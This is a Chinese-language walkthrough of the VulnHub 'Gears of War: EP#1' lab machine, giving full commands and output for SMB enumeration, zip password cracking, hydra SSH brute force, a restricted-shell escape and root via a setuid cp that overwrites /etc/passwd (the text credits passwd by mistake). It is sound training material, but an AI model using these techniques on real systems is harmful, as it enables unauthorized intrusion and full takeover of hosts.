vulhub系列-83-Gears of War: EP#1(超详细)
免责声明:本文记录的是 Gears of War: EP#1 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
描述:
这是一台夺旗机,讲述战争齿轮的历史,我们必须尝试逃出监狱并获得根权限。它有一些兔子洞,所以你必须尝试连接轨道才能获得访问权限。
一、信息收集
1、探测目标IP地址
arp-scan -l #探测当前网段的所有ip地址
┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:e2:78:c4 PCS Systemtechnik GmbH 192.168.5.21 08:00:27:18:35:96 PCS Systemtechnik GmbH 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.283 seconds (112.13 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24
┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 21:35 -0500 Nmap scan report for 192.168.5.1 Host is up (0.00014s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00019s latency). MAC Address: 08:00:27:E2:78:C4 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.21 Host is up (0.00018s latency). MAC Address: 08:00:27:18:35:96 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.11 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 4.95 seconds
目标IP:192.168.5.21
2、探测目标IP开放端口
nmap -sV -p- 192.168.5.21
┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.21 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 21:36 -0500 Nmap scan report for 192.168.5.21 Host is up (0.000048s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST) MAC Address: 08:00:27:18:35:96 (Oracle VirtualBox virtual NIC) Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.65 seconds
端口:22、80、139、445
3、网站扫描
┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.21/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.21/__26-02-23_21-36-59.txt Target: http://192.168.5.21/ [21:36:59] Starting: [21:37:00] 403 - 277B - /.ht_wsr.txt [21:37:00] 403 - 277B - /.htaccess.bak1 [21:37:00] 403 - 277B - /.htaccess.orig [21:37:00] 403 - 277B - /.htaccess.sample [21:37:00] 403 - 277B - /.htaccess.save [21:37:00] 403 - 277B - /.htaccess_sc [21:37:00] 403 - 277B - /.htaccess_orig [21:37:00] 403 - 277B - /.htaccess_extra [21:37:00] 403 - 277B - /.htaccessOLD [21:37:00] 403 - 277B - /.htaccessBAK [21:37:00] 403 - 277B - /.htaccessOLD2 [21:37:00] 403 - 277B - /.htm [21:37:00] 403 - 277B - /.html [21:37:00] 403 - 277B - /.htpasswd_test [21:37:00] 403 - 277B - /.htpasswds [21:37:00] 403 - 277B - /.httr-oauth [21:37:24] 200 - 64B - /robots.txt [21:37:25] 403 - 277B - /server-status [21:37:25] 403 - 277B - /server-status/ Task Completed
二、漏洞利用
1、访问/robots.txt
/marcus.html /dom.html /cole.html /baird.html /acarmine.html
检查其他的页面没有重要信息
2、SMB探测
a、发现smb
smbmap -H 192.168.5.21
┌──(root㉿kali)-[~] └─# smbmap -H 192.168.5.21 ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [\] Checking for open ports... [*] Detected 1 hosts serving SMB [|] Initializing hosts... [*] Established 1 SMB connections(s) and 0 authenticated session(s) [+] IP: 192.168.5.21:445 Name: 192.168.5.21 Status: NULL Session Disk Permissions Comment ---- ----------- ------- LOCUS_LAN$ READ ONLY LOCUST FATHER IPC$ NO ACCESS IPC Service (gears_of_war server (Samba, Ubuntu)) [-] Closing connections.. [\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
得到文件夹LOCUS_LAN$
b、访问smb
smbclient //192.168.5.21/LOCUS_LAN$
┌──(root㉿kali)-[~] └─# smbclient //192.168.5.21/LOCUS_LAN$ Password for [WORKGROUP\root]: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Oct 17 14:06:58 2019 .. D 0 Thu Oct 17 09:51:38 2019 msg_horda.zip N 332 Thu Oct 17 10:53:33 2019 SOS.txt N 198 Thu Oct 17 14:06:58 2019 5190756 blocks of size 1024. 2011892 blocks available smb: \> smb: \> get msg_horda.zip getting file \msg_horda.zip of size 332 as msg_horda.zip (29.5 KiloBytes/sec) (average 29.5 KiloBytes/sec) smb: \> smb: \> get SOS.txt getting file \SOS.txt of size 198 as SOS.txt (17.6 KiloBytes/sec) (average 23.5 KiloBytes/sec) smb: \> smb: \> quit ┌──(root㉿kali)-[~] └─# ls msg_horda.zip SOS.txt
获取了一个压缩包一个文件
3、生成密码字典
a、查看SOS.txt
┌──(root㉿kali)-[~] └─# cat SOS.txt This is a message for the Delta Team. I found a file that contains a password to free ........ oh no they here!!!!!!!!!!, i must protect myself, please try to get the password!! [@%%,] -Hoffman.
这是给 Delta Team 的一条信息。 我找到一个文件,里面包含了解锁……的密码……哦不,他们来了!!!!! 我必须保护自己,请你们试着找到密码!! [@%%,] Hoffman。
b、尝试解压zip文件
┌──(root㉿kali)-[~] └─# unzip msg_horda.zip Archive: msg_horda.zip [msg_horda.zip] key.txt password: skipping: key.txt incorrect password ┌──(root㉿kali)-[~] └─#
C、获取密码
# 使用crunch生成字典 crunch 4 4 -t @%%, -o list.txt # 暴力破解 fcrackzip -D -u -p list.txt msg_horda.zip
┌──(root㉿kali)-[~] └─# crunch 4 4 -t @%%, -o list.txt Crunch will now generate the following amount of data: 338000 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 67600 crunch: 100% completed generating output ┌──(root㉿kali)-[~] └─# fcrackzip -D -u -p list.txt msg_horda.zip PASSWORD FOUND!!!!: pw == r44M
得到密码解压密码:r44M
E、解压zip文件获取信息
┌──(root㉿kali)-[~] └─# unzip msg_horda.zip Archive: msg_horda.zip [msg_horda.zip] key.txt password: inflating: key.txt ┌──(root㉿kali)-[~] └─# ls 46459.py app.pyc e.py key.txt message.txt nitu.kdbx SOS.txt app64 creds.txt game.txt list.txt msg_horda.zip reports ┌──(root㉿kali)-[~] └─# cat key.txt "Vamos a atacar a los humanos con toda nuestras hordas, por eso puse en prision a el hombre mas peligroso que tenian, por lo que sin el son debiles." [[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]] -General RAAM.
得到3_d4y,疑似是一个密码,这里猜测是ssh的密码
4、ssh登录
a、获取密码
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.5.21
┌──(root㉿kali)-[~] └─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.5.21 Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-23 21:46:21 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task [DATA] attacking ssh://192.168.5.21:22/ [STATUS] 335.00 tries/min, 335 tries in 00:01h, 14344069 to do in 713:39h, 11 active [22][ssh] host: 192.168.5.21 login: marcus password: 3_d4y [STATUS] 305.67 tries/min, 917 tries in 00:03h, 14343487 to do in 782:06h, 11 active [STATUS] 305.71 tries/min, 2140 tries in 00:07h, 14342264 to do in 781:54h, 11 active
得到账户marcus/3_d4y
b、登陆ssh
ssh marcus@192.168.5.21 密码:3_d4y
┌──(root㉿kali)-[~] └─# ssh marcus@192.168.5.21 The authenticity of host '192.168.5.21 (192.168.5.21)' can't be established. ED25519 key fingerprint is: SHA256:63GFdRgqF2ztaC4ps1OyfL9ZA7GOoIvatMoxc/cIb78 This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.5.21' (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html marcus@192.168.5.21's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Feb 24 02:48:00 UTC 2026 System load: 0.18 Processes: 118 Usage of /: 56.1% of 4.95GB Users logged in: 0 Memory usage: 20% IP address for enp0s3: 192.168.5.21 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 48 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Oct 17 18:38:43 2019 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. marcus@gears_of_war:~$
登录成功
marcus@gears_of_war:~$ ls -la total 40 drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 . drwxr-xr-x 4 root root 4096 Oct 17 2019 .. -rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history -rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout -rwxrwxrwx 1 marcus marcus 3771 Apr 4 2018 .bashrc drwxrwxrwx 2 marcus marcus 4096 Oct 16 2019 .cache drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .gnupg drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 jail drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .local -rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile marcus@gears_of_war:~$ marcus@gears_of_war:~$ cd jail -rbash: cd: restricted marcus@gears_of_war:~$ marcus@gears_of_war:~$
查看当前密码信息,发现只有一个文件夹jail,且访问被限制了。
C、绕过低权限用户的shell的配置文件
ssh marcus@192.168.5.21 -t "bash -noprofile" 密码:3_d4y 通过 SSH 登录到 192.168.5.21 主机上的 marcus 用户,并启动一个新的 Bash shell,且不加载任何用户的配置文件。-t 选项确保了命令在交互式环境下正常工作。这样做通常用于绕过某些限制性 shell 设置,确保以更干净、更受控制的方式进入 Bash 环境。
┌──(root㉿kali)-[~] └─# ssh marcus@192.168.5.21 -t "bash -noprofile" ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html marcus@192.168.5.21's password: To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. marcus@gears_of_war:~$ ls jail marcus@gears_of_war:~$ cd jail marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ ls marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ ls -la total 8 drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 . drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 .. marcus@gears_of_war:~/jail$
什么也没有
三、权限提升
1、查找具有 setuid 权限的可执行文件
find / -type f -perm -u=s 2>/dev/null
marcus@gears_of_war:~/jail$ find / -type f -perm -u=s 2>/dev/null /bin/cp /bin/mount /bin/ping /bin/fusermount /bin/su /bin/umount /snap/core/7270/bin/mount /snap/core/7270/bin/ping /snap/core/7270/bin/ping6 /snap/core/7270/bin/su /snap/core/7270/bin/umount /snap/core/7270/usr/bin/chfn /snap/core/7270/usr/bin/chsh /snap/core/7270/usr/bin/gpasswd /snap/core/7270/usr/bin/newgrp /snap/core/7270/usr/bin/passwd /snap/core/7270/usr/bin/sudo /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/7270/usr/lib/openssh/ssh-keysign /snap/core/7270/usr/lib/snapd/snap-confine /snap/core/7270/usr/sbin/pppd /snap/core/7917/bin/mount /snap/core/7917/bin/ping /snap/core/7917/bin/ping6 /snap/core/7917/bin/su /snap/core/7917/bin/umount /snap/core/7917/usr/bin/chfn /snap/core/7917/usr/bin/chsh /snap/core/7917/usr/bin/gpasswd /snap/core/7917/usr/bin/newgrp /snap/core/7917/usr/bin/passwd /snap/core/7917/usr/bin/sudo /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/7917/usr/lib/openssh/ssh-keysign /snap/core/7917/usr/lib/snapd/snap-confine /snap/core/7917/usr/sbin/pppd /usr/bin/pkexec /usr/bin/newuidmap /usr/bin/gawk /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/traceroute6.iputils /usr/bin/gpasswd /usr/bin/newgidmap /usr/bin/chfn /usr/bin/at /usr/bin/sudo /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper marcus@gears_of_war:~/jail$
发现一个重要的漏洞,passwd有setuid权限,直接进行创建用户!
/usr/bin/passwdAI写代码bash
2、提权
**# 利用passwd创建用户** openssl passwd -1 -salt abc 123 # 添加用户和密码及其他信息至passwd文件中 cat /etc/passwd > /tmp/passwd2 vim /tmp/passwd2 cat /tmp/passwd2 # 切换用户 su abc 密码:123 # 获取flag cd id whoami pwd ls ls -la cat .flag.txt
marcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123 $1$abc$98/EDagBiz63dxD3fhRFk1 marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2 marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ vim /tmp/passwd2 marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ cat /tmp/passwd2 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ cp /tmp/passwd2 /etc/passwd marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ marcus@gears_of_war:~/jail$ su abc Password: root@gears_of_war:/home/marcus/jail# root@gears_of_war:/home/marcus/jail# cd root@gears_of_war:~# root@gears_of_war:~# id uid=0(root) gid=0(root) groups=0(root) root@gears_of_war:~# root@gears_of_war:~# root@gears_of_war:~# whoami root root@gears_of_war:~# root@gears_of_war:~# root@gears_of_war:~# pwd /root root@gears_of_war:~# root@gears_of_war:~# root@gears_of_war:~# ls root@gears_of_war:~# root@gears_of_war:~# root@gears_of_war:~# ls -la total 52 drwx------ 6 root root 4096 Oct 17 2019 . drwxr-xr-x 24 root root 4096 Oct 16 2019 .. -rw------- 1 root root 216 Oct 17 2019 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwx------ 2 root root 4096 Oct 17 2019 .cache -rw-r--r-- 1 root root 12732 Oct 17 2019 .flag.txt drwx------ 3 root root 4096 Oct 17 2019 .gnupg drwxr-xr-x 3 root root 4096 Oct 16 2019 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 2 root root 4096 Oct 16 2019 .ssh root@gears_of_war:~# root@gears_of_war:~# root@gears_of_war:~# cat .flag.txt .,*,, .*(((#((((*,. ,*/,,,..*/(((/*/#(. .*//*((####(/,,*,/(#(* ..,*//((*, ....**/**(##########%#(*,*(#/. .*/((#######((*. ..,*..*,,**///*,,,/(################(//*,. .,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,. .,/(((/((#(##########(,.,,,,//((/*/(####(##################(///. ,*(##(#((((/#######%#(###(##################################/((* .*((#/*/(/(#############(#######################(#((#(######*((* .*((((#####################################(########((######**/*. ,/##((###########################################(##########*,(///. *(((###%#####################################################(,****, .,/(##(#######%%#####%############(#(############################(***,. .**(##%##%###(#####((###############%######//,,*/((###################(,... ./(##((##%#(##(/(((((##########################/*. *(############%####(,. . **(####((###((///####%######################%####(*, ,((###############* .,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,. ..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*. .,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/ ,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((. .,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####* .**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####( .,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##, ,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(* ,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(* .*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/ ,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(. ./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(* .*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/ ,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#( /(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/ /#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/ (###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/ ./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/, .*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//. .*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/* ,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/, ,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/////**,. .,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/////////***, ..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,. ,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,. *(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,. ..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,.. ...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,. ..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,. .,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(////* .,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**. .,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/. ..,,********,,((####################(#(///******/*///(((###########%#####%###(/. . ,*******/(###################((#################################(###/, .,,,/**/##################(#######(#########################((####, .*/*/#######################################################(#(. .//############((((########(#######################((####((/*. . ,(##########(((((((###########################((###(((((((*, . .((############((((###(*,,*//*///*//(##%############((//**/*, .*(######(#(#######(**, .*(#######((((/(//**,, . ,*/#####((((((##/, .*. ./###((((////,. .,.,,//#########*.. . ,, /((/(/*, . . . ,../(#####(*/ . . .. * .. .,/(#*. . . .,../#, . . . . . .#/ . . .. .#/ . #/ . .(/ . /# . ,(. . . .. ,(( . Congratulation you got out of the jail and finish this Episode#1! Please share and support me on twitter! Twitter: @sir809 root@gears_of_war:~# root@gears_of_war:~# root@gears_of_war:~#
本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。